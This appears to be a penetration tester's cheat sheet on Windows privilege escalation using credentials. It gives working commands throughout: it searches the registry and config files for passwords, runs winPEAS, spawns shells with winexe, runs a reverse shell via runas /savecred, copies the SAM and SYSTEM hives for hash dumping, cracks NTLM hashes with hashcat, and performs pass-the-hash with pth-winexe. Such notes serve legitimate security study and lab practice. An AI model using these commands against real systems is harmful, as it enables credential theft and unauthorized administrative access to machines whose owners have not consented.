Search for passwords

Search the registry for passwords:

reg query HKLM /f password /t REG_SZ /s # local machine
reg query HKCU /f password /t REG_SZ /s # current usser

Use winPEAS to look for credentials in common places:

.\winPEASany.exe quiet filesinfo userinfo

Use passwords

With credentials we can use winexe to spawn a shell:

winexe -U '<user>:<password>' //<target_ip> cmd.exe

# if the user is admin, we can use the system option
winexe -U '<user>:<password>' --system //<target_ip> cmd.exe

Saved creds

  1. Use winPEAS to search for stored credentials
.\winPEASany.exe quiet cmd windowscreds
  1. Verify that with cmdkey:
cmdkey /list
  1. Start listener on Kali
  2. Run as the user with saved creds:
runas /savecred /user:<user> <revshell.exe> 

Configuration files

  1. Use winPEAS to search for files:
.\winPEASany.exe quiet cmd searchfast filesinfo 

Look for files like Unattend.xml which may contain a password (base64 encoded) for a user. 2. Search manually for files with passwords:

dir /s *pass* == *.config # pass in the name of ending with .config

findstr /si password *.xml *.ini *.txt # contains password and ends with these extensions
  1. winPEAS could find SAM or SYSTEM files. Copy them to Kali
  2. Use the tool pwdump from creddump7 suite and dump the hashes from SAM or SYSTEM files:
python2 <SYSTEM> <SAM>
  1. Use hashcat to crack the password:
hashcat -m 1000 --force <second_parth_of_the_hash> <wordlist>
  1. Instead of cracking the password, you can use Pass the Hash:
pth-winexe -U '<user>%<full_hash>' //<ip> cmd.exe

# if it is the admin, use system option

pth-winexe --system -U '<user>%<full_hash>' //<ip> cmd.exe